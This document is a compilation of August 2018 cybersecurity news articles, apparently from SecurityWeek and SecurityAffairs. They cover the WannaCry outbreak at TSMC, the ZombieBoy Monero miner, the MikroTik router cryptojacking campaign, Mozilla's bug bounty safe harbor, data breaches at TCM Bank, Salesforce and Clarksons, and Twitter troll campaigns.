“Spam and certain forms of automation are against Twitter's rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections. When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter's API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related,” Twitter said.

Duo Security has published a 46-page research paper describing its findings and techniques. The company will release its tools as open source on August 8 at the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” explained Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”

Mozilla to Researchers: Stay Away From User Data and We Won’t Sue
6.8.2018 securityweek  Security

Security researchers looking to find bugs in Firefox should not worry about Mozilla suing them, the Internet organization says. That is, of course, as long as they don’t mess with user data.

Mozilla, which has had a security bug bounty program for over a decade, is discontent with the how legal issues are interfering with the bug hunting process and has decided to change its bug bounty program policies to mitigate that.

Because legal protections afforded to those participating in bounty programs failed to evolve, security researchers are often at risk, and the organization is determined to offer a safe harbor to those researchers seeking bugs in its web browser.

According to the Internet organization, bug bounty participants could end up punished for their activities under the Computer Fraud and Abuse Act (CFAA),the anti-hacking law that criminalizes unauthorized access to computer systems.

“We often hear of researchers who are concerned that companies or governments may take legal actions against them for their legitimate security research. […] The policy changes we are making today are intended to create greater clarity for our own bounty program and to remove this legal risk for researchers participating in good faith,” Mozilla says.

For that, the browser maker is making two changes to its policy. On the one hand, the organization has clarified what is in scope for its bug bounty program, while on the other it has reassured researchers it won’t take legal action against them if they don’t break the rules.

Now, Mozilla makes it clear that participants to its bug bounty program “should not access, modify, delete, or store our users’ data.” The organization also says that it “will not threaten or bring any legal action against anyone who makes a good faith effort to comply with our bug bounty program.”

Basically, the browser maker says it won’t sue researchers under any law (the DMCA and CFAA included) or under its applicable Terms of Service and Acceptable Use Policy for their research performed as part of the bug bounty program.

“We consider that security research to be ‘authorized’ under the CFAA,” Mozilla says.

These changes, which are available in full in the General Eligibility and Safe Harbor sections of organization’s main bounty page, should help researchers know what to expect from Mozilla.

Fortnite APK is coming soon, but it will not be available on the Google Play Store
6.8.2018 securityaffairs Android

Fortnite, the most popular game will be soon available for Android users but the Fortnite APK will not be in the Play Store.
Fortnite continues to be the most popular game, it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The great success obtained by the Fortnite attracted cyber criminals that are attempting to exploit its popularity to target its fans.

Unfortunately for Android users, Fortnite for Android devices is not available yet, it is currently under development while the iOS version was released in March by Epic Games.

In the recent months, crooks attempted to take advantage of Android users’ interest in an alleged version for their devices of the popular game.

Experts discovered many blog posts and video tutorial with instructions to install fake Fortnite Android App.

Scammers are exploiting this interest to trick Android fans into downloading tainted version of the game that can compromise Android devices.

Fortnite APK

Now there is a news for the Android fans of the popular game, Epic Games confirmed the Fortnite APK for Android will be available for download exclusively only through its official website and not through the official Google Play Store.

According to the Epic Games CEO Tim Sweeney in this way, the company will have “have a direct relationship” with its consumers and will allow saving 30 percent fee that Google maintains when users download a software from the Play Store.

“The awesome thing about Fortnite is it’s brought a huge volume of digital commerce to Epic. We can now do that very efficiently. We can handle payment processing and customer support and download bandwidth with some great deals. We’re passing the savings along with the Unreal Engine Marketplace. We’ve change the royalty split from the 30/70 you see everywhere to developers getting 88 percent. We find that’s a great boon for developers.” Sweeney told GamesBeat.

Sweeney explained that the share of profits for the version running on Microsoft or Nintendo is right because the “enormous investment in hardware, often sold below cost, and marketing campaigns in broad partnership with publishers.”

Sweeney considers disproportionate 30% cut on the fee applied by Google for its services but evidently doesn’t evaluate the security features implemented by the Google store to avoid crooks will serve tainted versions of the Fortnite APK.

Even if in the past we have found several malicious apps uploaded to the Play Store, we cannot underestimate the Google’s efforts for the security of its users.

The availability of Fortnite APK on a third-party website could expose Android users to the risk of infection.

The only way to download an APK from a third-party store is to manually enable “Install Apps from Unknown Sources” option in the settings.

A large number of Android users will search “how to install Fortnite on Android,” these fans could be targeted in various ways, for example in black SEO campaigns devised to infect their devices.

“The move will simply encourage users to manually enable “Install Apps from Unknown Sources” option in the settings menu or accept a variety of Android security prompts in order to install Fortnite game directly from the Epic Games website.” reported The Hacker News.

“So, thousands of people out there searching, “how to install Fortnite on Android” or “how to download Fortnite APK for Android” on the Internet, could land themselves on unofficial websites, ending up installing malware.”

In order to install Fortnite on Android, players will have to download the Fortnite Launcher from the official Epic website, then it will allow them to load the Fortnite Battle Royale onto their devices.

Attackers can impersonate the legitimate source, for example by carrying out phishing campaign to trick Android users into downloading tainted version of Fortnite APK.

Chip Giant TSMC Says WannaCry Behind Production Halt
6.8.2018 securityweek

TSMC Chip Factory hit by Malware

Image Source: Taiwan Semiconductor Manufacturing Co., Ltd.

Chipmaker giant Taiwan Semiconductor Manufacturing Co (TSMC) said Monday the computer virus that brought its production to a halt for two days was a variant of the WannaCry ransomware that hit users all around the world.

WannaCry infected more than 200,000 users in more than 150 countries last year, encrypting user files and demanding ransom payments from their owners to get them back.

TSMC -- a key Apple supplier -- said some its computer systems and equipment in its Taiwan plants were infected on August 3 during software installation, which is expected to cause shipment delays and cutting third-quarter revenue by two percent.

It comes as Apple is set to release new iPhone models later this year.

TSMC declined to specify which customers and products are affected by the brief outage, but it said no confidential information was compromised.

Chief Executive Officer C.C. Wei told reporters and analysts on Monday that the virus has been eliminated and all production is back online.

Wei ruled out the incident as a hack targeted at the company, but an oversight by employees to conduct virus scans properly.

"This is purely our negligence so I don't think there is any hacking behaviour," he said.

"We regret this. There won't be any more human errors," said Wei.

He added that TSMC will develop a more automated anti-virus procedure going forward.

The firm said it is in close contact with its customers to minimise the impact, and maintains its sales growth outlook for the year.

Dept. of Energy announced the Liberty Eclipse exercise to test electrical grid against cyber attacks
6.8.2018 securityaffairs Attack

DoE announced the Liberty Eclipse exercise to test the electrical grid ‘s ability to recover from a blackout caused by cyberattacks.
This is the first time the Department of Energy will test the electrical grid’s ability to recover from a blackout caused by cyberattacks.

We have discussed many times the effects of a cyber attack against an electrical grid, the most scaring scenario sees wide power outage bringing population in the dark.

Is this a feasible scenario for the US critical infrastructure?

The Department of Energy wants to test the resilience of an electrical grid to a cyber attack, so it’s going to launch the first hands-on exercise to test the ability of the operators of such infrastructure in recovering from a blackout caused by a cyber attack.

According to the E&E News website, the Department of Energy plans to conduct a weeklong experiment, dubbed ‘Liberty Eclipse,’ that will take place starting Nov. 1 on a restricted area off the cost of New York called Plum Island.

“The Department of Energy is planning an unprecedented, “hands-on” test of the grid’s ability to bounce back from a blackout caused by hackers, E&E News has learned.” reported the E&E News website.

“The “Liberty Eclipse” exercise will simulate the painstaking process of re-energizing the power grid while squaring off against a simultaneous cyberattack on electric, oil and natural gas infrastructure. The weeklong stress test is scheduled to take place this November on Plum Island, a restricted site off the coast of New York that houses a Department of Homeland Security animal disease center.”

This is the first time that the Department of Energy is planning such kind of “hands-on” test of the grid’s ability to restore operations from a blackout caused by a cyber attack. The “Liberty Eclipse” exercise aims at evaluating the response of the infrastructure to coordinated attacks against an electric, oil and natural gas infrastructure. The DOE wants to prepare the infrastructure of the country for threats.

“It’s in our national security interest to continue to protect these sources of energy and to deliver them around the world,” Energy Secretary Rick Perry said at a cybersecurity conference in New York last week.

“Taking care of that infrastructure, from the standpoint of protecting it from cyberattacks — I don’t think it’s ever been more important than it is today.”

electrical grid

The goal of the Liberty Eclipse exercise is to prepare the response to a major incident caused by cyber attacks, that could be frequent events in a short future. Utilities that have to restore electricity following massive blackouts first need to provide initial jump of electricity before they can start generating it.

This operation is done by the operators by using diesel generators and other blackstart sources to choreograph “cranking paths” for restoring the functions of the electrical grid.

“Utilities can’t just flip a few switches to bring the lights on following a major shutdown. In fact, power plants typically need an initial jump of electricity before they can start generating it.” continues the E&E News website. Power companies rely on diesel generators and other blackstart sources to choreograph “cranking paths” for bringing the grid on its feet. Once enough pockets of electricity have been brought online, operators can sync up the islands with the wider grid.”

The entire process is time-consuming and can take many hours to be completed, even under the most favorable circumstances.

The DOE aims at speed up the restoration of the electrical grid by incorporating simulated cranking paths, provided by the Defense Advanced Research Projects Agency, that were designed for this reason.

“Together, [participants] will work to energize a blackstart cranking path by detecting the attack, cleaning malicious influence, and restoring crank path digital systems to operation,” the DOE states in a planning memo from last month.

This is the first exercise that is going to test the “blackstart” cranking paths that were excluded from previous simulations.

TCM Bank: website misconfiguration exposed applicant data for 16 months
6.8.2018 securityaffairs Hacking

TCM Bank announced that a Web site misconfiguration exposed applicant data for 16 months, between early March 2017 and mid-July 2018
TCM Bank, a subsidiary of ICBA Bancard, serves as a trusted advisor to community banks, it serves as a direct issuer of credit cards for more than 750 small and community U.S. banks who prefer not to issue cards themselves.

TCM Bank announced that a Web site misconfiguration exposed applicant data for 16 months, including names, addresses, dates of birth and Social Security numbers.

“In a letter being mailed to affected customers today, TCM said the information exposed was data that card applicants uploaded to a Web site managed by a third party vendor.” wrote the popular investigator Brian Krebs.

“TCM said it learned of the issue on July 16, 2018, and had the problem fixed by the following day.”

Thousands of people who applied for cards between early March 2017 and mid-July 2018 were affected by the incident.

The company notified the incident to the affected customers via email, data exposed belongs to card applicants uploaded to a Web site managed by a third party vendor.

The attorney Bruce Radke who is helping TCM confirmed that the number of affected customers is less than 10,000.

“It was less than 25 percent of the applications we processed during the relevant time period that were potentially affected, and less than one percent of our cardholder base was affected here,” Radke said.

“We’ve since confirmed the issue has been corrected, and we’re requiring the vendor to look at their technologies and procedures to detect and prevent similar issues going forward.”

TCM Bank

Businesses have to carefully review the level of security implemented by their partners to avoid those third-party incidents could have a significant impact on their operations.

“Many companies that experience a data breach or data leak are quick to place blame for the incident on a third-party that mishandled sensitive information. Sometimes this blame is entirely warranted, but more often such claims ring hollow in the ears of those affected — particularly when they come from banks and security providers.” concludes Krebs.

“Managing third-party risk can be challenging, especially for organizations with hundreds or thousands of partners”

ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis
6.8.2018 securityaffairs Cryptocurrency

A security researcher discovered a new crypto mining worm dubbed ZombieBoy that leverages several exploits to evade detection.
The security researcher James Quinn has spotted a new strain of crypto mining worm dubbed ZombieBoy that appears to be very profitable and leverages several exploits to evade detection.

The expert called this new malware ZombieBoy because it uses a tool called ZombieBoyTools to drop the first dll, it uses some exploits to spread.

Unlike MassMiner cryptocurrency miner, ZombieBoy leverages WinEggDrop instead of MassScan to search for new hosts to infect.


The cryptocurrency uses Simplified Chinese language, which suggests that its author is a Chinese coder.

The ZombieBoy mine leverages several exploits, including:

CVE-2017-9073, RDP vulnerability on Windows XP and Windows Server 2003
CVE-2017-0143, SMB exploit
CVE-2017-0146, SMB exploit
ZombieBoy also uses both NSA-linked exploits DoublePulsar and EternalBlue exploits to remotely install the main dll. The malware used the ZombieBoyTools to install the two exploits.

Once the has established a backdoor in the target system it could deliver other families of malware, such as ransomware, and keyloggers.

According to Quinn’s, the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor as well as an RDP backdoor.

The same component uses XMRIG to mine Monero coins at 43 KH/s, that means that users can earn $1,000 on a monthly base at the current rate.

“In addition, 64.exe uses XMRIG to mine for XMR. Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices.” continues the analysis.

Quinn highlighted that the miner is being updated constantly, he is observing new samples on a daily base.

The malware is able to detect VM and doesn’t run in a virtualized environment to make hard its detection.

Further details including IoCs are reported in the analysis published by the expert.

Tech Support Scams improved with adoption of Call Optimization Service
6.8.2018 securityaffairs

Security experts from Symantec are warning of tech support scams abusing Call Optimization Services to insert phone numbers.
Crooks are improving their tech support scams by using Call Optimization Services that are commonly used in legitimate call center operations to perform:

Tracking the source of inbound calls
Creation and management of phone numbers
Call load balancing
Call forwarding
Call analytics
Call routing
Call recording
Scammers continue to improve their techniques and now they are using the service to dynamically insert phone numbers into their scam web pages and potentially gain additional features to make their scams more successful

The scams begin when unaware victims visit a malicious website or are redirected to a bogus website in various ways such as a malvertising campaign.

“The scam web page informs the victim that the computer has been blocked due to a malware infection and tries to lure the user into calling a “toll free” number for assistance. An audio file, stating that the computer is infected, is also played in the background when the user arrives on the scam web page.” reads the analysis published by Symantec.

tech support scams

The malicious page implements some tricks to avoid victims will close the page. The pages show display notification dialogs in full-screen mode or execute a javascript routine that makes the site unresponsive.
The pages display a list of numbers to call to fix the problem and users in panic tend to call them.

According to Symantec, crooks leverages call optimization services in order to dynamically insert phone numbers into a scam page.

This specific tech support scams not only is performing browser fingerprinting, it retrieves the browser version as well based in which crooks redirect victims to different scam pages.

Crooks used a script in the call optimization services to check a specific tag in the scam URL, then the script retrieves the scammer’s phone number from the service’s servers. When the servers return the scammer’s phone number, the tag triggers the “Callback” function that retrieves and displays the appropriate phone number for victims to call.

If the tag from the call optimization service is not present in the scam URL, the phone number is retrieved by loading an XML file using the function loadXMLDoc() which is then displayed on the scam page.

The advantage of using the call optimization service’s tag in the URL is that it allows the scammers to dynamically insert phone numbers into their scam pages that are localized. “localized” to provide a different number based on the victim’s country.
Victims are shown a phone number that calls someone that speaks their language.
“However, by using the call optimization service’s tag in the URL the scammers can dynamically insert phone numbers into their scam pages,” continues Symantec.

“This can be useful, for example, if victims are based in multiple countries, as the victim can be shown a phone number that calls someone that speaks their language.”

Crooks can abuse Call Optimization Services in their tech support scams also for other goals, for example, to provide analytics, to implement load balancing during busy times to avoid losing calls.

Malware Hits Plants of Chip Giant TSMC
6.8.2018 securityweek

A piece of malware has caused significant disruptions in the factories of Taiwan Semiconductor Manufacturing Company (TSMC), the world’s biggest contract chipmaker.

TSMC’s most important customer is Apple, whose iPhone and iPad products use TSMC chips, but the company also supplies semiconductors to Qualcomm, Nvidia, AMD, MediaTek and Broadcom.

In a statement published on its website on Sunday, the company described the incident as a “computer virus outbreak” that impacted an unspecified number of computer systems and fabrication tools in Taiwan.

The infection was discovered on August 3 and the semiconductor foundry said it had restored 80 percent of systems by August 5, with a full recovery expected by August 6.

The company expects the incident to have a significant impact on its revenue for the third quarter. Financial Times reported that its revenue will take a hit of roughly $255 million.

“TSMC expects this incident to cause shipment delays and additional costs. We estimate the impact to third quarter revenue to be about three percent, and impact to gross margin to be about one percentage point. The Company is confident shipments delayed in third quarter will be recovered in the fourth quarter 2018, and maintains its forecast of high single-digit revenue growth for 2018 in U.S. dollars given on July 19, 2018,” TSMC stated.

“Most of TSMC’s customers have been notified of this event, and the Company is working closely with customers on their wafer delivery schedule. The details will be communicated with each customer individually over the next few days,” the company added.

According to TSMC, the malware made its way onto the network due to “misoperation” during the installation of a new tool. The company said the incident did not affect data integrity and it did not result in confidential information getting compromised.

Salesforce warns of API error that exposed Marketing data
5.8.2018 securityweek

The US Cloud-based customer relationship management software giant Salesforce is warning marketing customers of a data leakage caused by an API error.
The US cloud computing company Salesforce is warning marketing customers of a data leakage caused by an API error. The incident could potentially affect a large number of companies, including Aldo, Dunkin Donuts, GE, HauteLook, Nestle Waters, and Sony.

The error was in production between June 4 to July 18, and potentially affected users of two modules within the broader Marketing Cloud offering, the Email Studio and Predictive Intelligence solutions.

“On July 18, we became aware of an issue that impacted a subset of Marketing Cloud customers using Marketing Cloud Email Studio and Predictive Intelligence.” reads the notice published by Salesforce.

“We resolved the issue on that same day, July 18. Customers who may have been impacted were notified. For additional details, please see the Email Studio and Predictive Intelligence REST API Issue article here: https://sfdc.co/XIbG2”

salesforce marketing-cloud

The news was first reported by BankInfoSecurity that obtained a copy of the alert distributed by the company via email on Thursday.

Salesforce states that the error involved the company’s REST application programming interface.

“During a Marketing Cloud release between June 4, 2018, and July 7, a code change was introduced that, in rare cases, could have caused REST API calls to retrieve or write data from one customer’s account to another inadvertently,” reads the alert issued by Salesforce and published by BankInfoSecurity.

“Where the issue occurred, the API call may have failed and generated an error message rather than writing or modifying data.”

The company also warns that some customers may have had their data corrupted, it has also posted a knowledge article on the issue.

The bad news for the customers of the company. is that at the time it is not able to say if data was altered or is attackers maliciously tampered with.

“We have no evidence of malicious behavior associated with this issue,” a Salesforce spokesman told ISMG.

“We are unable to confirm if your data was viewed or modified by another customer,” Salesforce explained in its alert, noting that it was notifying all customers just to be on the safe side. “While Salesforce continues to conduct additional quality checks and testing in relation to this issue, we recommend that you monitor and review your data carefully to ensure the accuracy of your account.”

Do Businesses Know When They’re Using Unethical Data?
5.8.2018 securityweek Security

Data breaches are costly for businesses that expterience them, this data fuel the black markets and sometime are offered to complanies as legitimate data.
Data breaches are extraordinarily costly for businesses that experience them, both concerning reputational damage and money spent to repair the issues associated with those fiascos. And, on the consumer side of things, the scary thing is hackers don’t just steal data for notoriety. They do it to profit, typically by selling the snatched details online.

But, then, are other businesses aware of times when the data they just bought might have been stolen instead of legally obtained?

People Can Access Most of the Relevant Black Market Sites on Standard Browsers
There was a time when venturing into the world of the online black market typically meant downloading encryption software that hid the identity of users. However, most black market transactions happen on the “open” web so that it’s possible to access the respective sites via browsers like Firefox and Chrome without downloading special software first.

That means business representatives aren’t safe from coming across stolen data if they decide only to browse the internet normally. However, the kind of information advertised on the open web should be enough to raise eyebrows by itself. It often contains credit card information or sensitive medical details — not merely names, email addresses or phone numbers.

Companies can reduce the chances of unknowingly benefiting from stolen data by not proceeding with purchases if they contain private, not readily obtainable details.

Illegitimate Sellers Avoid Giving Payment Details
Even when people seek to profit by peddling stolen data, their desire to make money typically isn’t stronger than their need to remain anonymous. Most criminals who deal with data from illegal sources don’t reveal their names even when seeking payment. They’ll often request money through means that allow keeping their identities secret, such as Bitcoin.

Less Information, More Suspicion
If companies encounter data sellers that stay very secretive about how they get their data and whether it is in compliance with data protection and sharing standards, those are red flags.

However, even when data providers do list information about how they obtain data, it’s a good idea to validate the data on your own. For example, if you get calling data from a third-party provider, you should always check it against current Do Not Call lists.

Dark Web Monitoring Services Exist
As mentioned above, stolen data frequently works its way through the open web rather than the dark web. However, it’s still advisable for companies to utilize monitoring services that search the dark web for stolen data. The market for such information is lucrative, and some clients pay as much as $150,000 annually for such screening measures. If businesses provide data that comes up as originating from the dark web, that’s a strong indicator that it came from unethical sources.

data breaches

Do Legitimate Companies Create the Demand for Stolen Data?
It’s difficult to quantify how many reputable companies might be purchasing stolen data. If they do it knowingly, such a practice breaks the law. And, even if it happens without their knowledge, that’s still a poor reflection on those responsible. It means they didn’t carefully check data sources and sellers before going through with a purchase.

Unfortunately, analysts believe it happens frequently. After data breaches occur, some of the affected companies discover their data being sold online and buy it back. When hackers realize even those who initially had the data seized will pay for it, they realize there’s a demand for their criminal actions.

After suffering data breaches, some companies even ask their own employees to find stolen data and buy it back.

Most use intermediary parties, though representatives at major companies, including PayPal, acknowledge that this process of compensating hackers for the data they took occurs regularly. They say it’s part of the various actions that happen to protect customers — or to prevent them from knowing breaches happened at all.

If companies can find and recover their stolen data quickly enough, customers might never realize hackers had their details. That’s especially likely, since affected parties often don’t hear about breaches until months after companies do, giving those entities ample time to locate data and offer hackers a price for it.

Plus, it’s important to remember that companies pay tens of thousands of dollars to recover their data after ransomware attacks, too.

Should Businesses Bear the Blame?
When companies buy data that’s new to them, they should engage in the preventative measures above to verify its sources and check that it’s not stolen. Also, although businesses justify buying compromised data back from hackers, they have to remember that by doing so, they are stimulating demand — and that makes them partially to blame.

Instead of spending money to retrieve data that hackers take, those dollars would be better spent cracking down on the vulnerabilities that allow breaches to happen so frequently.

Russian troll factory suspected to be behind the attack against Italian President Mattarella
5.8.2018 securityweek BigBrothers

The Russian shadow behind the attack on Italian President Mattarella, a coordinated attack via Twitter involved hundreds of profiles inviting him to resign.
Cybersecurity experts and Italian media believe that the Italian President Sergio Mattarella is the last victim of the Russian troll farm.

On May 27 the late afternoon, thousands of Twitter profiles suddenly started spreading messages against the Italian president asking him to resign.

The messages appeared as a coordinated attack, they were using the hashtag #MattarellaDimettiti (Italian translation: “Mattarella resign”). Messages using this hashtag were rapidly spreading across the Internet, many other legitimate users started using it and it is quite easy to find similar legitimate message today.

But someone has triggered the protest online, someone who has clear interests to destabilize the Italian government.

Actual vice-premier Luigi Di Maio was asking for the indictment of President Mattarella who refused to endorse the choice of a candidate to the Minister of Economy because of his known anti-euro position.

The analysis of social media Twitter revealed that around at two o’clock in the morning there was an anomalous spike in the number of messages against the President Mattarella.

President Mattarella

Were they sleepless Italians or someone was attempting to influence the sentiment of the population on specific topics?

According to the Huffington Post Italy, in just a few minutes there were about 400 new profiles, that were traced back to a single origin, coordinating the misinformation campaign.

The Huffington Post reported that the Italian law enforcement Polizia Postale confirmed that the source of the campaign was one, but due to countermeasures adopted by the attackers was impossible to find the control room and attribute the attack to a specific threat actor.

“It is well known that, with high probability, it should have been created abroad, even if no one is able to say whether the Russian operators involved in disruptive actions in the American election campaign are involved.” states the Huffington Post citing the Italian newspaper Corriere della Sera.

According to the Huffington Post, at least twenty Twitter profiles involved in the attack against Italian President Mattarella belonging to completely unsuspecting Italians had been used one or more times by the Internet Research Agency (Ira) of Saint Petersburg, also known as the Russian troll factory.

The same accounts were involved in other propaganda campaigns in favor of populist parties, sovereignists, and anti-Europeans.

This is the conclusion of an analysis conducted on a sample composed of 67% of the archive related to the activity of the Internet Research Agency (Ira) that was published by the Firethirtyeight website.

The website published 3 Million Russian Troll tweets that were analyzed by the US prosecutor Robert Mueller as part of the investigation of the Russian influence on the 2016 Presidential election.

The huge number of tweets was collected by the researchers Darren Linvill and Patrick Warren from the Clemson University.

The archive includes roughly 16,000 tweets in the Italian language, according to the Italian newspaper Corriere della Sera, some of the accounts were particularly active and were fueling discussions against government representatives.

Now let me close with a simple consideration … the propaganda online attributed to the Internet Research Agency is really very noisy, and I fear it was designed to be so, likely under a wider diversionary strategy.

Involving more sophisticated technologies it is possible to obtain better results, let’s think of the involvement of artificial intelligence.

Putin said several times that the nation that leads in AI ‘will be the ruler of the world,’ and I’m sure that the involvement of machine learning systems in a troll factory can produce results much better than actual ones.

Is the Internet Research Agency itself the result of a bigger troll farm the already leverage artificial intelligence?

A malware paralyzed TSMC plants where also Apple produces its devices
5.8.2018 securityweek

A virus has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the plants where Apple produces its devices
A malware has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the iPhone chipmaker plans.

TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc.

According to Bloomberg that first reported the news, the infection caused one of the most severe disruptions suffered by the company as it ramps up chipmaking for Apple Inc.’s next iPhones.

The company contained the problem, but some of the affected plants will not able to restart before Sunday.
“The sole maker of the iPhone’s main processor said a number of its fabrication tools had been infected, and while it had contained the problem and resumed some production, several of its factories won’t restart till at least Sunday. The virus wasn’t introduced by a hacker, the company added in a statement.” states the Bloomberg.

“Certain factories returned to normal in a short period of time, and we expect the others will return to normal in one day,” the company said in its Saturday statement.

This is the first time that a malware cripples a TSMC facility paralyzing the production, according to the company “the degree of infection varied from factory to factory.”
“TSMC has been attacked by viruses before, but this is the first time a virus attack has affected our production lines,” Chief Financial Officer Lora Ho told Bloomberg News by phone.

TSMC Apple infection

The economic impact of this kind of incidents could be severe, at the time there is no info about losses caused by the attack on the Taiwanese firm.

At the time it is not possible to estimate the potential effects on the production of Apple devices, “the implications are also unclear for Apple.”

“The incident comes weeks after TSMC cheered investors with a rosy outlook for smartphone demand in the latter half of the year. That helped the market look past a reduced revenue outlook.” reported Bloomberg.

“A bellwether for the chip industry as well as an early indicator of iPhone demand, it heads into its busiest quarters grappling with waning enthusiasm for the high-powered chips used to mine digital currencies. Chief Executive Officer C. C. Wei had said TSMC’s sales will rise this year by a high single-digit percentage in U.S. dollar terms, down from an already reduced projection of about 10 percent”

MikroTik Routers Exploited in Massive Crypto-Mining Campaign
4.8.2018 securityweek
Exploit  Cryptocurrency

Attackers managed to infect tens of thousands of MikroTik network routers in Brazil with code that injects the CoinHive in-browser crypto-mining script into web traffic.

The attack emerged on July 31, when more than 70,000 MikroTik devices in the country started displaying the same behavior. With all using the same CoinHive site-key, it became apparent that a single actor was behind the attack.

No zero-day was used in this massive attack, as MikroTik, a Latvian router manufacturer, patched the targeted vulnerability back in April 2018. The issue, however, is that the vulnerable devices haven’t been updated in a timely manner.

At the moment, there are “hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Trustwave’s Simon Kenin, the researcher who analyzed the attack, reveals.

The employed exploit provides the attacker with the ability to read files from a vulnerable MikroTik router and get unauthenticated remote admin access to the device.

As part of this attack, however, the actor didn’t run a malicious executable on the router, but leveraged the device’s functionality to inject the CoinHive script into every web page the user visited.

For that, the attacker created a custom error page with the CoinHive script in it, which resulted in the user landing on that page when encountering any kind of error page while browsing. The attack works in both directions, meaning that users who visit websites behind those infected routers are impacted as well.

Initially, users would encounter the CoinHive script on every visited page, likely because the attacker, who appears to have high understanding of how the MikroTik routers work, might have built code to inject the script in every page.

In addition to modifying the device’s settings to serve the crypto-mining error page, the attacker also created a backdoor on the compromised devices. Kenin also noticed that the script has been updated several times during his investigation.

“The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected,” the researcher notes.

Kenin also noticed that, although the attack was initially focused on Brazil, MikroTik devices in other countries started being infected as well. In fact, he eventually discovered that over 170,000 routers globally appeared to have the CoinHive site-key.

By targeting MikroTik’s vulnerable carrier-grade router devices, the attackers ensured a broad reach: impacted are not only users behind the routers, but also the visitors of any website hosted behind such a router.

“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” Kenin points out.

While the routers were exploited to deliver a crypto-mining payload, the devices coudl have been exploited for other objectives, Sean Newman, Director Product Management at Corero Network Security, sold SecurityWeek. "From a DDoS perspective, the scale of processing power available in such devices could easily be leveraged for a single attack which could extend to tens of terabits per second, or many smaller attacks if they were used as part of a DDoS for hire service," Newman said.

Global Shipping Firm Clarksons Provides Update on 2017 Breach
3.8.2018 securityweek  Incindent

Clarkson PLC (Clarksons), a global shipping services firm, this week provided an update to the breach it suffered between May and November 2017. Little further on the nature of the breach is revealed, other than the extent of the customer personal information that was stolen.

In November 2017, Clarksons revealed that a single compromised user account had allowed attackers to infiltrate their systems, exfiltrate personal data, and demand a ransom for its safe return. Clarkson's declined to pay the ransom, and for some time it was expected that the data might be revealed. "I hope our clients understand that we would not be held to ransom by criminals, and I would like to sincerely apologise for any concern this incident may have understandably raised," said Andi Case, CEO of Clarksons.

In its latest statement (PDF) the firm claims it was able -- with the help of law enforcement and forensic specialists -- to successfully trace and recover the stolen data. It doesn't state -- and probably could not know -- whether the stolen data had been copied before it was recovered. It is nevertheless warning those potentially affected by the incident to, "Remain vigilant against incidents of identity theft and fraud by reviewing personal account statements for suspicious activity and to detect errors."

What is most surprising in this updated information is the extent of personal information that was stored by the company and stolen by the criminals. In full, the statement says,

"While the potentially affected personal information varies by individual, this data may include a date of birth, contact information, criminal conviction information, ethnicity, medical information, religion, login information, signature, tax information, insurance information, informal reference, national insurance number, passport information, social security number, visa/travel information, CV / resume, driver's license/vehicle identification information, seafarer information, bank account information, payment card information, financial information, address information and/or information concerning minors."

There is no mention of whether any of this data was encrypted or hashed. Identity theft, bank fraud and blackmail are the most obvious threats if such data were in the wrong hands.

"In this particular incident, what is honestly shocking is the amount of sensitive data that this single account had access to and I am sure the EU GDPR will be looking closely," comments Joseph Carson, chief security scientist at Thycotic. "If it is found that EU GDPR applies, and Clarkson PLC had failed to apply adequate security, they could be facing a huge financial penalty." Whether GDPR can be invoked will be up to the individual EU regulators. Clarksons claims the intruder had access to its systems from May 31, 2017 until November 4, 2017; which is before GDPR became active on May 25, 2018.

Rishi Bhargava, co-founder at Demisto, told SecurityWeek that Clarksons appears to have gone through the mechanics of breach notification conscientiously. "Clarksons seems to have provided updates and apprised affected individuals in a comprehensive and transparent manner," he said. "There are numerous cross-industry regulations to deal with while implementing breach notifications, and the granularity of US state-specific information shared by Clarksons is testament to that."

But he added, "The bigger question to consider is whether Clarksons needed to retain all this personal information in the first place. With GDPR introducing strict regulations for data processing, data consent, explicit need for processing, retention timelines, and deletion, organizations need to rethink their entire ‘data supply chain' if they haven't already. However transparent breach notifications are, they're still a post-breach exercise and need to be matched by operational data discipline in order to truly bring accountability to data processors."

It is possible that the tracing and recovery of the stolen data also implies knowledge of the perpetrator -- he or she may even be in custody. If this is true, it will probably be only through subsequent court documents that we discover exactly how the breach occurred. However, most security experts believe our knowledge so far points to a failure to use multi-factor authentication, and a failure to adequately manage privileged accounts.

Timur Kovalev, CTO at Untangle, told SecurityWeek, "While unfortunate, these sorts of breaches are certainly not uncommon. However, there are steps that organizations can take to mitigate their risk. Requiring multi-factor authentication for user accounts is a rational first step. Additionally, IT departments need to limit access of even properly credentialed users to only those apps and systems that are critical for that person's business use. Finally, companies can reduce the amount of customer data they are storing anywhere on networked systems; GDPR will certainly help accelerate this best practice."

Carson agrees. "The lesson to be learned from this incident is the importance in protecting accounts with privileged access to sensitive data and that those accounts should never use a password as the only security control. Similarly, a single account should never have full access to such a large amount of data -- at least without peer reviews and approval processes."

The question of whether Clarksons had a valid reason to store that amount of highly sensitive personal data remains one for the regulators.

Google Offers G Suite Alerts for State-Sponsored Attacks
3.8.2018 securityweek  Attack

Google this week announced that it can now alert G Suite admins when it believes users have been targeted by government-backed attackers.

The search company has been notifying users on what it believes might be state-sponsored attacks for over six years, and reaffirmed its commitment to continue alerting users on such incidents last year.

The Internet giant is now providing G Suite admins with the option to receive alerts whenever attacks appearing to be coming from a state-sponsored actor are targeting their users. The feature will show up in the G Suite Admin console as soon as it becomes available.

“If an admin chooses to turn the feature on, an email alert (to admins) is triggered when we believe a government-backed attacker has likely attempted to access a user’s account or computer through phishing, malware, or another method,” Google explains.

